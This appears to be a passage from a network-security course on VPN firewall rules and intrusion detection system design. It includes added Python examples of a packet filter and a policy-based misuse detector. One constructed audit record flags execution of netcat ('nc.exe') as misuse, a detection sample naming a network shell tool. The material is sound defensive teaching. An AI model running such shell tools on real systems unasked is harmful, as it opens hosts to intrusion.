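The two answers above mix TCP/UDP ports with IP protocol numbers (GRE is IP protocol 47, ESP is IP protocol 50), and a firewall rule that opens "port 47" or "port 50" does nothing for the tunnel. The following is an added example, not code from the course, that encodes both rule sets as a tiny stateless packet filter so the distinction can be checked against constructed packets. The VPN server address and the packet records are assumptions.

```python
"""Stateless packet-filter check for the PPTP and L2TP/IPSec rule sets.

Added example (not course code). The rule tables encode the ports and IP
protocol numbers from the lesson review. Packets are constructed dicts with
'proto' (IP protocol number), 'dst' and, for TCP/UDP, 'dport'.
"""
from dataclasses import dataclass
from typing import Optional

VPN_SERVER = "10.0.10.1"      # assumed external address of the VPN server

# IANA IP protocol numbers
TCP, UDP, GRE, ESP = 6, 17, 47, 50


@dataclass(frozen=True)
class Rule:
    name: str
    proto: int              # IP protocol number the rule matches
    dport: Optional[int]    # destination port, or None for GRE/ESP (no ports)
    dst: str                # destination host


# Inbound rules a firewall needs for a PPTP server behind it.
PPTP_RULES = (
    Rule("PPTP tunnel maintenance", TCP, 1723, VPN_SERVER),
    Rule("PPTP tunneled data (GRE)", GRE, None, VPN_SERVER),
)

# Inbound rules for L2TP over IPSec.
L2TP_IPSEC_RULES = (
    Rule("IKE", UDP, 500, VPN_SERVER),
    Rule("L2TP", UDP, 1701, VPN_SERVER),
    Rule("IPSec ESP", ESP, None, VPN_SERVER),
)


def rule_matches(rule, pkt):
    """True when the packet's protocol, destination and (if any) port match."""
    if pkt["proto"] != rule.proto or pkt["dst"] != rule.dst:
        return False
    if rule.dport is None:
        # GRE and ESP sit directly on IP; there is no port to compare.
        return True
    return pkt.get("dport") == rule.dport


def allowed(pkt, rules):
    """Return the name of the first matching rule, or None (default deny)."""
    for rule in rules:
        if rule_matches(rule, pkt):
            return rule.name
    return None


if __name__ == "__main__":
    # Constructed packets: a correct PPTP pair, and the classic mistake of
    # opening UDP port 47 instead of IP protocol 47.
    samples = [
        {"proto": TCP, "dst": VPN_SERVER, "dport": 1723},
        {"proto": GRE, "dst": VPN_SERVER},
        {"proto": UDP, "dst": VPN_SERVER, "dport": 47},
    ]
    for pkt in samples:
        print(pkt, "->", allowed(pkt, PPTP_RULES))
```

Run as a script it shows the third packet denied: a UDP datagram to port 47 is not GRE. The same check on `L2TP_IPSEC_RULES` shows ESP (protocol 50) accepted while a TCP 1723 packet is dropped, since PPTP rules are not part of that set. (When an L2TP/IPSec client sits behind NAT, IKE and ESP are additionally carried in UDP port 4500 via NAT traversal; that case is outside the lesson's rule table and is not modelled here.)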
What are security vulnerabilities of a VPN? What technologies can be
used with a VPN to make it more secure?
Key management is a critical security vulnerability of a VPN. PKI technolo-
gies can be used with a VPN to make it more secure.
6I What is the encryption standard supported by Microsoft's implementation
of PPTP?
MPPE.
What are the transport protocols used by PPTP and L2TP?
PPTP uses TCP, and L2TP uses UDP.
LESSON 7
Designing an Intrusion Detection System
Overview
In this lesson, you will be introduced to the concepts surrounding one of the
areas critical to the defensive network protection scheme: the Intrusion
Detection System. This system, in conjunction with the firewall technologies
in place, is the basis for a very solidly defended network. The Intrusion
Detection System will be used to detect when an intruder is attempting
penetration of the network or tampering with the firewalls.
Objectives
To design an Intrusion Detection System, you will:
7A Examine the goals of Intrusion Detection Systems.
Given the components of Intrusion Detection Systems, you will describe
how the components interact to accomplish the goals of intrusion
detection.
7B Describe the technologies and techniques of intrusion detection.
Given a scenario of users in a network, you will examine the process of
intrusion detection and how behavioral use is implemented in the IDS.
7C Describe host-based IDSs.
Given a network of connected hosts, you will describe how host-based
IDSs identify an intrusion.
7D Describe network-based IDSs.
Given a network of connected hosts, you will describe how network-
based intrusion detection systems identify an intrusion.
7E Examine the principles of intrusion detection data analysis.
Given an example signature of an incident, you will examine the concepts
and methods of data analysis.
7F Describe the methods of using an IDS.
Given network scenarios, you will identify multiple uses of IDS for
detection of, monitoring of, and anticipation of attacks.
Data Files: none
Lesson Time: 2 hours
7G Define what an IDS cannot do.
Given a network situation, you will identify the functions an IDS cannot
complete.
Topic 7A
The Goals of an Intrusion Detection System
As the months and years go by, security professionals have an increasingly
difficult task of keeping the network secure. What makes this job so difficult? Is it the
fact that there are more threats than ever? Perhaps, but there is more to it than
that. Is it the fact that there are more people on the Internet year after year? It
contributes, but there is more to it than that, too.
As you build complex interconnected networks, where partners from the outside
require access to the inside, where you have employees telecommuting, and
where you have internal connections to external suppliers, the problem grows. It
is the very nature of the industry to be even more connected.
This connection comes with a price. The price is the extreme difficulty in
securing the network. In order for networks to continue to grow and be functional,
there must be a certain degree of trust built into the systems. However, on top of
the level of trust, there must be verification of this trust. The method most often
employed by organizations these days is a solid Intrusion Detection System
(IDS).
The three general components of network security from a need perspective are
shown in Figure 7-1.
Figure 7-1: Components of network security.
Most security analysts and professionals are at least familiar with these concepts.
Over the last 30 years or so, most organizations had focused the vast majority of
their time, energy, and budget on prevention. The logic seemed obvious: if it
were possible to stop the majority of threats from getting in, then the network
could be reasonably secured.
Then came the networks of today. These complex, interconnected networks do
not have this clear-cut boundary, where the goal is to keep the bad people out and
the good people in. Reliance on perimeter defense of a firewall alone is no longer
adequate.
Perhaps even more of an issue is the fact that most organizations do not have
systems in place to detect the very attacks that can lead to financial loss. This
again proves that the firewall defense is not enough. The ability to detect
intrusion through defense is critical to the overall security of the network.
What is Intrusion Detection?
Before you can get into a detailed definition of intrusion detection, let's return
briefly to the standard network defense system. The common method for
protecting the network is to follow the layered defense policy. While this is a solid base
to network security, it does have its limitations.
A common analogy to this problem is to investigate the castle structure (or
fortress structure) of centuries ago. As you discussed earlier, the fortress would have
a large, thick stone wall surrounding the main structure. There would perhaps be
a large moat on the outside of the wall, with only a large drawbridge as an
entrance.
This presented a solid defense, and there are many instances recorded of a small
group of soldiers holding off many times the number of attackers. The question
then arises, if the defense was so strong, why did the fortress model fade away?
The attackers got smarter. They realized that attacking the front door was
effective at times, but the losses could be enormous to gain entry. The attackers also
realized that the soldiers inside the fortress seemed to be getting new supplies,
but no one was seen going through the front door. This indicated a hidden door
elsewhere, as was often the case. This hidden back door would be the key to the
attackers capturing the fortress.
What is the solution to the back door? Many in the fortress assumed the back
door was secure, and with all the fighting on the front, there were little resources
left to guard the hidden entrance.
The swarming attackers, once inside, would seize the fortress from the inside out,
and quickly overwhelm the one soldier left there to guard this door. Had solid
intrusion detection systems been in place, odds are that the fortress would not be
so quick to fall.
Although this is a fun analogy (except for the soldiers!), it is quite correct.
Today's modern networks are well guarded with firewalls. But, there needs to be
a way to know if someone is trying to get through a side door, a hole in the
firewall, or if people on the inside of the firewall need monitoring.
The solution of adding layers may help with the defense, but as layers are added,
the function of the network often suffers. It becomes more tedious to allow a
single connection through from a remote supplier when there are five layers to
navigate.
This is where intrusion detection comes in. By itself, intrusion detection will not
prevent access to resources. However, it is a method to use in identification of
criminal activity, assistance in gathering evidence, and, perhaps most importantly,
indication of attacks in progress.
Intrusion detection is the process of detecting and responding to computer and/or
network misuse. Throughout this lesson, you will be introduced to the different
options of detection and the ways to define misuse. Some of the questions you
will need to answer are:
What constitutes an intrusion?
What is our definition of detection?
What is our definition of misuse?
How will we define a false-positive?
How will we define a false-negative?
Some Intrusion Detection Definitions
As you get further into this lesson, you need to be aware of some of the common
IDS terms and their definitions. There are many definitions of IDS terms; the
ones that follow are intended to give you a basic level of understanding. This is
not intended to be a complete glossary, but the terms that are required for this
lesson and the discussion of IDSs are listed in the following table.
Term: Definition
Intrusion: Unauthorized access to, and/or activity in, an information system.
Misuse: Improper use of resources inside the organization, regardless of
intention.
Intrusion detection: The process of detecting unauthorized access or attempted
unauthorized access to resources.
Misuse detection: The process of detecting unauthorized activity that matches
known patterns of misuse.
Anomaly detection: The process of detecting any variations from acceptable network
use and activity, based on known patterns of use.
Vulnerability scanners: The process of examining systems to locate problems or areas
that could indicate security vulnerabilities.
Security vulnerabilities: A feature or error found in system software or system
configurations that provides a method of entry for an attacker, or
provides for an opportunity for misuse.
Some of the groups that you might want to research for further definitions and
standards on IDS are: the Recent Advances in Intrusion Detection (RAID) group,
the Intrusion Detection Sub-Group (IDSG) of the President's National Security
Telecommunications Advisory Committee (NSTAC), and the Intrusion Detection
Systems Consortium (IDSC).
The IDS Matrix
Figure 7-2 is an interesting true-false matrix showing the relationship between
IDS configurations and alarms going on or off in response. Very simply put, any
IDS has to be trained to look for trouble, by programming in one or more
signatures, where a signature can be considered a representation of patterns of traffic
or behavior that spells trouble.
Figure 7-2: The classic true-false matrix of IDS.
Think of a police officer who has just pulled over a car. The officer walks over
and asks the driver for his license and registration. The driver starts to reach into
his jacket.
To a trained officer, this is a signature action representative of someone reaching
for a handgun. According to the training the officer has received, an alarm should
go off in his head. He should yell at the driver to freeze, and then very firmly
order the driver to step out and search him for a handgun.
Now, in the above scenario, if the officer does discover a handgun, it is
representative of a true-positive. If there is no handgun, it is representative of a false-
positive.
Let's change the scenario a bit. If the officer is not trained well, the action of the
driver reaching into his jacket will not be seen as a signature action of someone
reaching for a handgun. According to the training the officer has received, no
alarms go off in his head. He doesn't yell at the driver to freeze. You might say
here that the officer has been inadequately programmed.
In this changed scenario, the officer does not see the action of the driver reaching
into his jacket as a threat, and if the driver simply pulls out his license and
registration from his jacket, it is representative of a true-negative. However, if the
driver does pull out a handgun, it is a false-negative!
As much as most of us would want to live in a world of the true-negative, it is
unfortunately not the case. There are large numbers of true-positives (still OK)
and many false-positives that you have to put up with. Then there is the
complacent but dangerous world of false-negatives.
To summarize:
If the configuration of signatures is done right for the environment that the
IDS is in, the state of the IDS is TRUE.
If the configuration of signatures is not done right for the environment that
the IDS is in, the state of the IDS is FALSE.
If the alarms go off as programmed, it's said to be POSITIVE.
If the alarms do not go off as programmed, it's said to be NEGATIVE.
Given the previous analogy with respect to an IDS, you can define the states in
the following table.
State: Description
True-positive: The event when an alarm is indicating an intrusion when there is an actual
intrusion.
False-positive: The event when an alarm is indicating an intrusion when there is no actual
intrusion.
True-negative: The event when an alarm does not occur and there is no actual intrusion.
False-negative: The event when an alarm does not occur when an actual intrusion is carried
out.
IDS Components
An IDS in a network of today is a group of processes working together, and, in
virtually every case, these processes are on different computers and devices
across the network. The very nature of an IDS has grown from its rather simple
name. Today's IDS is much more than a detection of intrusion. Most IDSs will
have the abilities to do one or more of the following:
Recognition of patterns associated with known attacks.
Statistical analysis of abnormal traffic patterns.
Assessment and integrity checking of defined files.
Monitoring and analysis of user and system activity.
Network traffic analysis.
Event log analysis.
Although the systems vary from vendor to vendor, these features of IDSs have
similar requirements for implementation. These components are generic, meaning
that most IDS applications will have these in one form or another.
The Command Console
The command console is where the IDS is monitored and managed. It maintains
control over the IDS components, and the console should be accessible from any
location. Generally, the command console will maintain open channels between
network sensors over encrypted paths, and is a dedicated machine.
The Network Sensor
Network sensors are programs that run on network devices or dedicated
machines, or both, on essential network segments. The network sensors may be
defined as agents, and they are often configured in promiscuous mode. Sensor
placement is critical in the network because there could be thousands of targets
that need monitoring.
When all networks used hubs, you could place a sensor on any port of the hub,
since all traffic is sent out from all ports of a hub, and the tap could detect any
anomalous traffic. However, when the conversion to switches happened, this
changed things for the hub. Switches send traffic only to the correct host, and so
a tap may miss communication on a switch.
To address this issue, a common configuration technique is to use switches that
have an expansion port on them (much of the newer networking equipment has
this), and connect the IDS to this expansion port.
These ports are known as Switched Port ANalyzer (SPAN) ports. SPAN ports can
be configured by the security professional to mirror all switch transmissions so
that the single port can be used by the IDS to monitor designated traffic.
The Network Tap
The network tap is a hardware device that sits on the network, can be rack
mounted, and, to the untrained eye, can appear to be a hub or a switch. As part
of an IDS, the network tap, which has no IP address, sniffs network traffic and
sends an alert when an intrusion is detected.
Having a network tap in your network-based IDS will make the overall system
more secure, as attacking the hardware device is not an effective technique for
the vast majority of attackers. Although widely considered a solid tool in your
IDS arsenal, there are design issues you will have to overcome for proper tap
deployment.
Network taps require the monitoring of two data streams, for the two directions
of your full duplex network traffic. Although you will be able to monitor your
network's traffic using two streams, this might present a cumbersome solution for
your environment. Newer products are designed to combine the two streams so
that you will need only one connection from the tap to monitor all traffic.
Alert Notification
Alert notification is the portion of the system that is responsible for contacting
the incident handler. Modern IDSs can provide alerts via many options such as
pop-up windows, audible tones, paging, email, and Simple Network Management
Protocol (SNMP).
Realistic Goals of IDS
Although there are varied goals for intrusion detection from organization to
organization, there are two that can generally be counted on being present. The two
general goals, aside from the initial detection itself, are response and
accountability.
The IDS Response
When discussing the response of an IDS, one must recognize first what it is. A
response is the end result of an IDS analyzing data. The end result is a result
calling for action. The action is what must be defined.
The most common response is not quite as exciting as many security
professionals would like: it is a simple entry placed in the log file. Even though the log
file entry does not have the glamour of a Hollywood intrusion response, it may
turn out to be the most useful. The log file report has the data that many
organizations will use in determining the overall IT security budget.
Other responses can include a trigger that will issue a call to the security
architect's pager, or even a pop-up window or email message. During an attack, the
response can also be the ability to have the network modify itself. A command
may be issued to change or block port numbers, or to disable services. This
response during an attack can prove to be the vital element that keeps the
network from compromise.
SNMP (Simple Network Management Protocol): Software used to control
network communications devices using TCP/IP.
Note: Exercise caution in determining the level of response to incidents.
Aggressive or offensive responses may open up the organization to serious legal
issues. It is suggested that legal counsel is consulted during response decisions.
Accountability
Having the response options is a valuable portion of all IDSs and should be
configured as part of the network security policy, but many systems must provide
proper accountability as well. This accountability provides the option to trace the
misuse event of intrusion to the responsible party.
Accountability is one of the hardest tasks in implementing an IDS, given that
users change systems and attacks can come from spoofed sources. This is a
critical step in the overall protection of a network, however, and this becomes even
more evident in the event that the organization pursues legal avenues against an
attacker. Ideally, the accountability system will enable the Security Professional to
locate not only the computer used in the attack, but its physical location and, if
possible, the user who initiated the attack.
TASK 7A-1
Describing Alarms
1. Describe the differences between a false-positive alarm and a false-
negative alarm.
A false-positive is when an alarm indicates an intrusion when there is no
actual intrusion. A false-negative is when an alarm does not occur when an
actual intrusion is carried out.
Topic 7B
Technologies and Techniques of Intrusion
Detection
Now that you are armed with the basics of intrusion detection, let's build on your
new knowledge. The next step is to investigate the technologies and techniques
commonly associated with IDSs.
The Intrusion Detection Process
To further define how IDS functions, let's examine a case with IDS in action. In
this example, you will look at a system in an Ethernet network with the sensor
running in promiscuous mode, sniffing packets off the local segment.
1. A host creates a network packet. So far, nothing is known other than a
packet exists that was sent from a host in the network.
2. The sensor on the network reads the packet in real time off the network
segment. This sensor needs to be placed so it can read the packet.
3. The detection program in the sensor matches the packet with known
signatures of misuse. When a signature is detected, an alert is generated, which is
sent to the command console.
4. The command console receives the alert, and in turn notifies the designated
person or group of the detection. (The alert is done via a predefined method,
email, pop-up window, page, and so on.)
5. The response is created in accordance with the programmed response for this
matching signature.
6. The alert is logged for future reference, either locally or in a database.
7. A summary report is created with the incident detailed.
8. The alert is viewed with other historical data to determine if there is a
pattern of misuse or to indicate a slow attack.
promiscuous mode: Normally, an Ethernet interface reads all address
information and accepts follow-on packets only destined for itself, but when
the interface is in promiscuous mode, it reads all information (sniffer),
regardless of its destination.
Figure 7-3: A visual example of the IDS process.
Figure 7-3 is only one example of the potential process of the IDS. As you
progress through this lesson, you will see different processes.
Behavioral Use
For the system to generate the correct response in the correct situation, it must be
programmed with starting data. The starting data is where misuse is defined
(along with alerts and response techniques). If the system is expected to
determine misuse, then the individual who programs this data needs to know how the
organization defines misuse.
A starting point for this process is to determine the network activity that the IDS
will attempt to deal with. The following diagrams illustrate the various steps in
determining use, both acceptable and unacceptable. Figure 7-4 shows all the uses
of a network.
Figure 7-4: All of the uses of the network.
In Figure 7-5, you can see that a basic clarification between acceptable and
unacceptable use has been made, according to the security policies that are applicable
to the usage categories. (Only some of the options that the security policy may
cover are included in this example.)
The security policy for this organization might include the following:
No users are allowed to telnet to remote hosts.
Users can open only the files they are allowed to open.
Users can access network printers only in their allocated areas.
Users can execute only those applications they have been granted access to
use.
Figure 7-5: The dividing line between acceptable and unacceptable use of resources.
In order to meet these policy requirements, you must divide network and resource
access to acceptable and unacceptable use. At this point, you have categorized
resource use to define what is considered acceptable and unacceptable. This is a
generalization for the entire network, with the given that there will be exceptions
made for specific users.
From this diagram, you can see that the dividing line specifies that telnet is
unacceptable, as is opening of unauthorized files, trying to execute applications
without permission to do so, or attempting to use unauthorized network printers.
Once this dividing line has been created, the rules for the IDS can be
implemented. This is where the task increases, as the number of signatures of
known attacks and intrusions is the limitation. If the company has unique
applications, the IDS must be made aware of the corresponding signatures. Remember,
an IDS can only do what it is told to do, just like any other component of the
network.
Although the line in our example is a nice solid line between acceptable and
unacceptable, in reality, there are times when the line is not so clear. Crossing
over the line is when false signals might be sent, as shown in Figure 7-6. In other
words, if something that the policy has identified as acceptable has not been
entered into the IDS and therefore is not known as acceptable, the IDS might
send an alarm indicating an incident. This is known as a false-positive. False-
positives take time and energy, and as much as possible, they should be
minimized by proper policy making and data entry in the IDS.
A false-negative, on the other hand, is more than lost time and energy. In fact, a
false-negative does not equate lost time and energy, since no one is aware that the
condition happened. In other words, a false-negative is when an incident should
cause an alarm, but it does not. This is a serious issue, and those responsible for
the IDS of an organization need to be sure that the policies created, and the
rules implemented, minimize the opportunities for false-negatives to occur.
Figure 7-6: False situations, both positive and negative.
Since, in reality, the dividing line is not so clear, it becomes important for the
security professional to be aware of the applications running and the current
security policies of the organization. The same security professional needs to be made
aware of any unusual activity that might take place in the network.
For example, if the organization has recently hired 20 new Help Desk users, their
trainer might be showing them various options and situations in the network, such
as what it looks like to attempt access to unauthorized files, or to attempt to log
on as a different user. The security professionals in the network need to know this
is happening, so that their response is correct for the situation.
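The following is an added example, not code from the course, that ties the true/false matrix from Topic 7A to the dividing-line policy above. It runs a handful of rule-based signatures (telnet, unauthorized file, unauthorized application, out-of-area printer) over constructed audit records, compares the alarms against a constructed ground truth, and counts true-positives, false-positives, true-negatives and false-negatives. The user names, file paths, printer names, policy tables and the "Help Desk training" account are all assumptions made for the example; the printer signature is deliberately left out of the initial signature set to show how a missing signature surfaces as a false-negative, and the training account shows how an un-entered exception surfaces as a false-positive.

```python
"""Policy-driven misuse detection with a true/false matrix.

Added example (not course code). All records, policy tables and ground-truth
labels are constructed for illustration.
"""
import re
from collections import Counter

# Constructed audit records: who did what, to which resource, from which area.
RECORDS = [
    "user=alice action=print target=PRN-FIN-01 area=finance",
    "user=bob action=telnet target=192.168.5.20 area=ops",
    "user=carol action=open target=/payroll/salaries.xls area=finance",
    "user=dave action=exec target=payroll.exe area=hr",
    "user=erin action=open target=/public/handbook.pdf area=ops",
    "user=frank action=open target=/payroll/salaries.xls area=helpdesk",
    "user=gina action=print target=PRN-FIN-01 area=ops",
    "user=hal action=exec target=nc.exe area=ops",
]

# Constructed ground truth, one label per record: True = real misuse.
# frank's record is a supervised Help Desk training demonstration, so it is
# not an intrusion even though it crosses the policy line.
TRUTH = [False, True, False, False, False, False, True, True]

# Constructed policy data (what the security policy says each user may do).
ALLOWED_FILES = {"carol": {"/payroll/salaries.xls"},
                 "erin": {"/public/handbook.pdf"}}
ALLOWED_APPS = {"dave": {"payroll.exe"}}
PRINTER_AREA = {"PRN-FIN-01": "finance", "PRN-OPS-02": "ops"}

FIELD = re.compile(r"(\w+)=(\S+)")


def parse(line):
    """Turn a 'key=value key=value' record into a dict."""
    return dict(FIELD.findall(line))


# Signatures: each encodes one line of the sample security policy.
def sig_telnet(r):
    return r["action"] == "telnet"                       # no telnet at all


def sig_file(r):
    return r["action"] == "open" and \
        r["target"] not in ALLOWED_FILES.get(r["user"], set())


def sig_app(r):
    return r["action"] == "exec" and \
        r["target"] not in ALLOWED_APPS.get(r["user"], set())


def sig_printer(r):
    return r["action"] == "print" and \
        PRINTER_AREA.get(r["target"]) != r["area"]      # printer outside area


# Initial data entry: the printer rule was never entered into the IDS.
BASE_SIGNATURES = {"telnet": sig_telnet,
                   "unauthorized-file": sig_file,
                   "unauthorized-app": sig_app}


def detect(lines, signatures, exceptions=frozenset()):
    """Return (alarmed, matched-signature-names) for each record."""
    results = []
    for line in lines:
        r = parse(line)
        if r["user"] in exceptions:          # known, policy-approved exception
            results.append((False, ()))
            continue
        hits = tuple(name for name, fn in signatures.items() if fn(r))
        results.append((bool(hits), hits))
    return results


def matrix(results, truth):
    """Count the four IDS states by comparing alarms with ground truth."""
    states = {(True, True): "true-positive", (True, False): "false-positive",
              (False, False): "true-negative", (False, True): "false-negative"}
    counts = Counter({name: 0 for name in states.values()})
    for (alarmed, _), real in zip(results, truth):
        counts[states[(alarmed, real)]] += 1
    return dict(counts)


if __name__ == "__main__":
    print("initial rules :", matrix(detect(RECORDS, BASE_SIGNATURES), TRUTH))
    tuned = {**BASE_SIGNATURES, "printer-area": sig_printer}
    print("tuned rules   :",
          matrix(detect(RECORDS, tuned, exceptions=frozenset({"frank"})), TRUTH))
```

With the initial signature set the run produces one false-positive (frank's training demonstration) and one false-negative (gina printing to a finance printer from ops, which no entered signature covers); adding the printer signature and recording the training exception removes both. In practice the exception should be scoped to the training window rather than to a user name for good, since a permanent blanket exemption is itself a source of false-negatives.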
Information Collection and Analysis
As you begin to work with the tools available to you, you will need to become
comfortable with data collection and analysis. In this section, you will not go into
significant detail on the headers and data content; that will be addressed
elsewhere. Instead, you will discuss the concepts of data collection and the
concepts of data analysis.
With all the sources available to work with, an intimidating problem can arise
quickly to the security professional working on the IDS of an organization. Some
of the many questions that will arise are:
What is to be collected?
What data is to be discarded?
What is to be identied in the data that is collected?
Once I do identify certain things in the data, are they good, bad, or neutral?
382 Tactical Perimeter Defense
We previously defined an intrusion as anything from threats to theft to misuse,
but now you must define analysis. What actually is analysis? Although there
might be many different meanings, in this discussion analysis is the concept of
organizing and categorizing data according to the security policies present for
the network.
The analysis must identify the intrusions as previously defined. The data
collected, then, is the record of those intrusions. A record can be about a user,
a node, an IP address, or any other given variable, again meeting the
requirements of the policy.
In order to begin the analysis process, there must first be an analysis system in
place. The analysis system can be as simple as reading a single log file at night,
or as complex as multiple IDSs submitting data to an external database for future
data mining.
Regardless of the scale of the system, there are certain requirements that must be
met, and all systems have these in common: the ability to generate the initial
data, to categorize the data based on given rules, and to process the data once it
is organized.
The collection of the data will be identied by the IDS, based on the rule set in
place for the policy. This data collection can be either user misuse of resources,
actual data theft, denial of service, or any of the types of data you have discussed
that might be part of the IDS.
Once the data has been collected, it must be organized in a usable format. This
categorization can generally be defined by the cause of alarm and filed
accordingly. Two general categories that are commonly used are Misuse Of
Resources and Threats.
It is also common to organize the data by the type of signature present. If the
attack was of a known signature, such as a Ping of Death DoS attack, it can be
classied as such. By organizing the data using these known signatures, the
analysis phase can be a more efficient process, as the data is in the order of
attack.
TASK 7B-1
Discussing IDS Concepts
1. What are the differences between misuse and intrusion?
Misuse can occur if a user has access to a resource but uses that resource
for a purpose not intended by the owner of that resource. However, if a user
does not have access to a resource but gains access by subverting the
network's or resource's security, or by any other devious means, this is
considered intrusion.
2. Describe behavioral use in terms of an IDS.
First, categorize all network and resource usage into a set. Then, divide
network and resource access into two categories, acceptable and unacceptable
use, based on policies that have been agreed to. This is a generalization for
the entire network, with the given that there will be exceptions made for
specific users. Over a period of time, look for patterns of usage of these
resources to build a database of behavioral use.
Remember, not all misuse detection is a threat.
Topic 7C
Host-based Intrusion Detection
Now that the fundamental issues of intrusion detection have been covered, you
will examine the actual options for implementation. In this topic, you will detail
the host-based IDS.
Host-based IDS is where the data that will be analyzed is generated by hosts
(computers) in the network. This system has many variables in data collection,
since the source is so varied. A host-based system can be collecting data from
application logs, such as Web servers. At the same time, it is collecting data from
operating system logs.
Because the system is host based, it is generally quite good at detecting internal
misuse of resources. The event logs of each host can generate data on files
accessed, by whom, on what date, and at what time. This provides excellent
tracking data of misuse and, in the event of compromise, evidence of the attack.
Host-based IDS Design
Host-based IDS uses what are known as agents (also called sensors). These
agents are small programs running on the hosts, and they communicate with the
command console (remember, this is the central computer controlling the IDS).
There are two basic forms of host-based IDS design: centralized and distributed.
One difference to keep in mind as you go through the steps of each is that the
centralized design requires the data from the host to be sent to the command
console for analysis, whereas in the distributed design the host analyzes the
data in real time and sends only alert notifications to the command console.
Centralized Host-based IDS Design
As mentioned, a centralized design dictates that the data will be collected by the
host and sent over the network to the command console for analysis. Because the
host only gathers and forwards the data, there is no significant performance drop
on the hosts, or agents. However, there also is no possibility of real-time
detection and response.
The following steps highlight the process of centralized design, and are shown in
Figure 7-7.
1. The host detects that an event has happened (such as opening a file, or
logging on to a user account). The event is written as an event record. The
record is written to a secured file on the host.
2. At a predefined time, the host sends its records to the command console over
the network, using a secured (encrypted) link.
3. The command console receives the records and submits the data to the
detection engine.
4. The detection engine analyzes the data for known signatures.
5. The command console generates a log of its work as a data archive.
6. If an intrusion is detected, the command console generates an alert, and the
programmed notification is used.
7. The security professional receives the notication.
8. A response to the alert is created. The response used by the console has been
previously programmed by the security team for this type of intrusion event.
9. The alert is stored in a secured database.
10. The data used for generating the alert is archived.
11. The console generates a report of the alert activities.
12. Long-term analysis is used to determine if this alert is part of a bigger
intrusion.
Figure 7-7: Centralized host-based IDS example.
Distributed Host-based IDS Design
The primary difference between centralized and distributed host-based IDS is
where the detection engine and analysis take place. In the distributed design, the
agents of hosts are the ones that perform the analysis.
There is a significant advantage to this method: the intrusion data can be
monitored in real time. The flip side is that the hosts themselves can experience
a performance drop, as their processor is engaged in this work constantly.
The following steps highlight the process of distributed design, and are shown in
Figure 7-8.
1. The host detects that an event has happened.
2. The event is processed in real time in the detection engine, and is analyzed
for known signatures.
3. If an intrusion is detected, a notification is sent. (Some vendors have the
host generate the notification; others have the command console generate the
notification.)
4. A response to the intrusion is created. This can be from the host or console.
5. The alert of the intrusion is created and sent to the console, where it is
archived.
6. Long-term analysis is used to determine if this is part of a bigger intrusion.
(Only the alert data is available to the console for this analysis, so it might be limited.)
Figure 7-8: Distributed host-based IDS example.
TASK 7C-1
Describing Centralized Host-based Intrusion Detection
1. Describe where and how data is collected in a centralized host-based
IDS.
1. The host detects that an event has happened. The event is written as an
event record. The record is written to a secured file on the host.
2. At a predefined time, the host sends its records to the command console
over the network, using a secured (encrypted) link.
3. The command console receives the records and submits the data to the
detection engine.
4. The detection engine analyzes the data for known signatures.
5. The command console generates a log of its work as a data archive.
6. If an intrusion is detected, the command console generates an alert,
and the programmed notification is used.
7. The security professional receives the notication.
8. A response to the alert is created. The response used by the console has
been programmed by the security team for this type of intrusion event.
9. The alert is stored in a secured database.
10. The data used for generating the alert is archived.
11. The console generates a report of the alert activities.
12. Long-term analysis is used to determine if this alert is part of a bigger
intrusion.
Topic 7D
Network-based Intrusion Detection
The concepts and implementation of the host-based IDS might lead you to
believe that it is the best way to run your IDS. This might not be the case.
Although there are advantages to running a host-based system, it does not suit
every situation or meet every need.
If you require the IDS in your organization to analyze the actual TCP/IP traffic,
then network-based IDS is your choice. The IDS in a network-based design is
such that it will sniff the packets off the wire. Hardware devices, such as switches
and routers, can also be programmed to send this data directly to the IDS.
A signicant difference between host- and network-based IDS is the actual loca-
tion of the agents. In host-based IDS, the agents, or sensors, are placed directly
on the hosts. In network-based IDS, the source of the detection is often placed so
that it can sense the external traffic, or the intrusion attempts from the outside.
This allows the network-based system to detect what the host-based normally
cannot, such as a DoS.
Another example of a difference between these two implementations would be the
detection of attempted access to a system by an attacker. Suppose, for a moment,
that an attacker breaks into the network and attempts to log in to a host. The
host-based system will not report, or have the ability to identify, anything until
the actual login request happens. The network-based system will identify the pat-
tern of the request itself, before (ideally) the attacker has successfully logged in.
Network-based IDS Design
The physical layout of the network-based IDS is such that sensors are installed in
key positions throughout the network, and they all report to the command
console. In this case, the sensors are full detection engines that have the ability to
sniff the packets, analyze for known signatures, and notify the console with an
alert if an intrusion is detected.
There are two basic forms of design of network-based IDS: traditional and
distributed. The traditional design uses sensors in promiscuous mode, sometimes
called network taps. The distributed design employs agents throughout the net-
work to sense network traffic that is destined for the host itself.
Traditional Network-based IDS Design
Traditional design of network-based IDS uses sensors in the network. A sensor is
a host that is configured to run the IDS software and is usually a stand-alone
computer. Further, each sensor has a network card (and software) installed that
can run in promiscuous mode, to sniff the network traffic. The packets are then
fed directly into the detection engine, where analysis can happen. The general
theory on sensor placement is that there should be one on each critical segment
of the network. The alarms generated are then sent to the command console. This
design is depicted in Figure 7-9.
The following steps highlight the process of the traditional design:
1. A network packet is sent from one host to another in the network (this can
include a packet from the Internet to a firewall).
2. The packet is pulled off the network in real time by the network sensor,
which is generally positioned between the two communicating hosts.
3. The packet is processed in real time in the detection engine, and is analyzed
for known signatures.
4. If a signature match is detected, an alert is created and forwarded to the
command console.
5. The security professional is notied of the alert.
6. A response to the alert is created. The response used by the console has been
programmed by the security team for this type of intrusion event.
7. The alert is archived for later analysis, and a report of the incident is
created.
8. Long-term analysis is used to determine if this is part of a bigger intrusion.
Figure 7-9: Traditional network-based IDS example.
Distributed Network-based IDS Design
Despite the effectiveness of the traditional design in collecting network packets, it
is susceptible to packet loss on network segments. A variation of the traditional
design was introduced to address this situation: the distributed design. In the
distributed design, a sensor is installed on each host in the network, instead of on
each segment of the network. The sensors then communicate with each other in the
event of an intrusion, and use the command console as a center of operations, and
for alarms.
As you might imagine, this type of design has led to much confusion on the dis-
tinction between network- and host-based IDS. What you must realize is that the
location of the sensor, or agent, is not the determining factor in what type of
design is implemented.
If the IDS is running on each computer and those computers are analyzing tasks
of the operating system, then it is host-based. If the IDS is running on each com-
puter and those computers are analyzing the packets with the Ethernet device,
then it is network-based. This is important to remember, specically when dealing
with IDS vendors. Be sure that if you buy a commercial product, you get exactly
what you want. The process is depicted in Figure 7-10.
The following steps highlight the process of the distributed design:
1. A network packet is sent from one host to another in the network (this can
include a packet from the Internet to a firewall).
2. The packet is pulled off the network in real time by the network sensor, on
the individual host.
3. The packet is processed in real time in the detection engine, and is analyzed
for known signatures.
4. If a signature match is detected, an alert is created and forwarded to the
command console.
5. The security professional is notied of the alert.
